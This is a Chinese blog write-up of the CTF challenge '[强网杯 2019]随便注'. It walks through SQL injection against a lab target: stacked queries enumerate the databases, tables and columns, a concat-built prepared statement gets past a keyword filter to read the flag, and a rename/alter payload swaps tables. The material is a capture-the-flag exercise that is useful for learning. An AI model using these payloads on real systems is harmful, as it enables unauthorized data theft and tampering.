[强网杯 2019]随便注

最新推荐文章于 2024-03-30 16:17:25 发布
最新推荐文章于 2024-03-30 16:17:25 发布
阅读量178 收藏
点赞数
分类专栏: 一些web题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/oubasangdadada/article/details/104692727
版权
  1. 1' or 1=1--,回显了所有用户信息
  2. union select 1,2
    得到回显
return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

过滤了:

select 
update 
delete 
drop
insert
where

继续,由于过滤了select,尝试堆叠注入:

1';show databases;--

得到:

ctftraining information_schema mysql performance_schema supersqli test

继续:

1';show tables;--

得到:

1919810931114514 words

继续:

1';show columns from words;--

得到:

id data

继续:

1';show columns from `1919810931114514`;--

回显:

flag
NO

flag 应该就是在这里,但是这里回显的应该是words 表里面的,并且后端逻辑应该是:
select * from words where id='$id'
所以我们现在要想办法获取 1919810931114514 表里的数据:

1';sel/**/ect flag fr/**/om `1919810931114514`;--

不可
接下来使用预编译:

1';SEt @x=concat('sel','ect ','flag from `1919810931114514`');pREpare s from @x;execute s;--

另外还有一种,利用 renamealter,

1’;rename table words to word1;rename table 1919810931114514 to words;alter table words add id int unsigned not Null auto_increment primary key; alert table words change flag data varchar(100);#

这种方法是用 rename1919810931114514 重命名为 words,使系统查询到的数据直接变成我们想要的flag

yyvegetable
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
[安洵杯 2019]easy_web
qq_40327508的博客
05-30 616
[安洵杯 2019]easy_web 考点:MD5强类型绕过,命令入绕过 进入发现img参数可能有任意文件下载 通过2次base64解密和一次hex转字符串 得到555.png 再通过相同的方式获取到了index.php的源码 <?php error_reporting(E_ALL || ~ E_NOTICE); header('content-type:text/html;charset=utf-8'); $cmd = $_GET['cmd']; if (!isset($_GET['img'])
攻防世界-Web高手进阶区-supersqli(强网杯随便)
feng的博客
09-14 1556
前言 此题可谓是奇技淫巧甚多,之前做过一次,不过当时没有写WP。今天偶然又看到了这个题目,打开环境发现又有些不会,因此又把这题相关的知识点和各种技巧看了一遍,写下这篇WP。 WP 首先进入环境,发现是SQL入。我们先简单的进行一些测试,发现是字符型入,因此加一个单引号然后后面加#来闭合,然后测试1=1,1=2,发现都可以,然后进行order by测试,发现是2。但是在进行union入的时候出现: return preg_match("/select|update|delete|drop|insert|
攻防世界web高手区supersqli解法(详细)
qq_53105813的博客
05-25 1807
supersqli 翻译一下为超级数据库 打开题目很明显,直接想到sql入 验证一下猜想 提交 1’ and 1=1#和1‘ and 1=2#(输入框中没有显示在url中) 说明存在入漏洞 接下来用order by判断字段 提交 1'order by 2# 提交 1'order by 3# 说明只有两个字段爆出 接下来尝试爆数据库名 提交: 1'union select 1,database()# 返回错误信息 return preg_mat...
buuctf[强网杯 2019]随便 1(超详细,三种解法)
m0_73734159的博客
10-26 2153
网页环境判断是否是字符型入1'判断是否存在关键字过滤select联合查询被过滤,只能用堆叠入了查看有几个字段正常回显回显报错,可以看出只有两个字段查看所有数据库查看所有数据表爆words数据表的字段爆1919810931114514数据表字段(意数据表为数字的时候需要用反引号括起来);可以看到这两个表words表有两个字段,而另一个只有一个字段。
supersqli-攻防世界
szhangliwenya的博客
03-30 2087
因为 H 对应 ASCII 码值为 72,e 对应 ASCII 码值为 101,l 对应 ASCII 码值为 108,o 对应 ASCII 码值为 111。根据提交方式:POST入,GET入,HTTP HEAD入。根据有无回显:联合入,报错入,布尔盲,延时入。1' and 1=1 #没报错判断为单引号字符入。其他入:堆叠入,宽字节入,二次入等。1' order by 3#报错。
BUUCTF -web- [强网杯 2019]随便
qq_44640313的博客
12-14 2473
以buuctf的强网杯2019为例的堆叠
【BUUCTF】web之强网杯2019随便
12-14
开始入: 1’ : 报错 ...# 这里意表名为数字的要加反引号 “ :在网上百度发现 得到 一个带有flag的字段 和 另一个 可查询的表 flag表:可查询表: 到这里虽然发现flag 但是select已经被ban了所
[强网杯 2019]随便.docx
12-18
强网杯 2019】SQL 入详解 SQL 入是一种常见的网络安全漏洞,攻击者通过在输入参数中嵌入恶意的 SQL 代码,从而控制或篡改数据库的行为。在本题中,参赛者面对的就是一道典型的 SQL 入题目。首先,通过尝试...
强网杯 WriteUp By Nu1L
08-02
强网杯 WriteUp By Nu1L》是关于2022年第六届“强网杯”全国网络安全挑战赛的一份技术分析报告,由Nu1L团队撰写。在这篇WriteUp中,作者分享了他们在竞赛中遇到的各种挑战和解决策略,涵盖了Pwn、Reverse、Find_...
强网杯2021 Web.zip
12-17
【标题】:“强网杯2021 Web.zip”是一个与网络安全竞赛相关的压缩文件,名为“强网杯”,这通常是指“强网杯”网络安全技能大赛。该比赛是中国最高级别的网络安全竞赛之一,旨在提高参赛者的网络防御和攻防能力,...
2019 第三届强网杯线上赛.zip
12-17
强网杯
sql入-堆叠+二次
xiaoheizi的博客
06-28 379
判断字段,结果提示return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);首先启动并访问靶机,有一个输入框,随便输入1',发现报错了,说明可能存在sql入。更新操作,把七个表的数据全部更新到一个总表中,因为我们在教育经历模块填写了(在创建简历时候有七个模块,每次填写完一个模块点击保存后——数据库会执行一次。打开网站会员中心,点击创建简历,填写信息,一直到教育经历。查询操作,把总表中的内容在页面展示出来,因为。
sql入学习分享
这个时代,作为程序员可能要学习小程序
09-25 363
点击上方关 “终端研发部”设为“星标”,和你一起掌握更多数据库知识WEB框架web应用一改我们平时常见的 p2p 和 C/S 模式,采用 B/S 模式。随着网络技术的发展,特别随着Web技术的不断成熟,B/S 这种软件体系结构出现了。浏览器-服务器(Browser/Server)结构,简称 B/S 结构,与 C/S不同,其客户端不需要安装专门的软件,只需要浏览器即可,浏览器与Web服务器交互,W...
BUUCTF[强网杯 2019]随便 的三种解法
热门推荐
qq_44657899的博客
11-27 2万+
00X01 [强网杯 2019]随便 1’ or 1=1 #
BUU sql入-[强网杯 2019]随便
Ivyyyyyy1的博客
10-15 1717
一、题目 一进来先看看能否用构造单引号闭合: 发现提示报错,可以操作了 二、解题 方法一:handler命令打开 先查列数,这里是输入2没报错,但输入3报错了,所以是2列 试试联合查询: 回显信息是 return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); $inject是我们在输入框中提交的变量名,preg_match()在这里的作用是检测关键字,猜测会被...
[CTF]强网杯2019随便
凉水的博客
10-16 312
简介 对安全有兴趣,BUUCTF上一道一道做,记一些有意思的东西。 关键点 1 发现入点 这题很容易实验,最简单的1’ or 1之类的语句可以测出来,闭环单引号就可以。 #释符号,如果没起作用,需要意使用url编码。 2 PHP的防入 发现可以随便之后,试了union select之类的,也面提示: return preg_match("/select|update|delete|drop|insert|where|\./i",$inject); 搜了一圈,没发现可以绕过的方法。 然后尝试多语句
mysql练习(一)
CloserSide的博客
09-13 387
mysql练习一、例子二、约束 一、例子 例1: create table a( name varchar(10) ); 例2: create table b( name varchar(10), height decimal(5,2) ); 例3:创建表c create table c( id int, name varchar(20), age tinyint UNSIGNED ); 例4:往表C中插入一条记录。 insert into c values (0,'王五'
pi_heif-0.17.0-cp310-cp310-manylinux_2_17_aarch64.whl
最新发布
07-27
pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。pip install 直接安装,无需再下载,直接用。
buuctf-强网杯2019随便
09-03
buuctf-强网杯2019随便是一场2019强网杯举办的CTF比赛中的一道题目。这道题目的名称暗示着它是一个与入漏洞相关的题目。 入漏洞是一种网络安全漏洞,攻击者可以通过在用户输入的数据中入恶意代码来获取...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值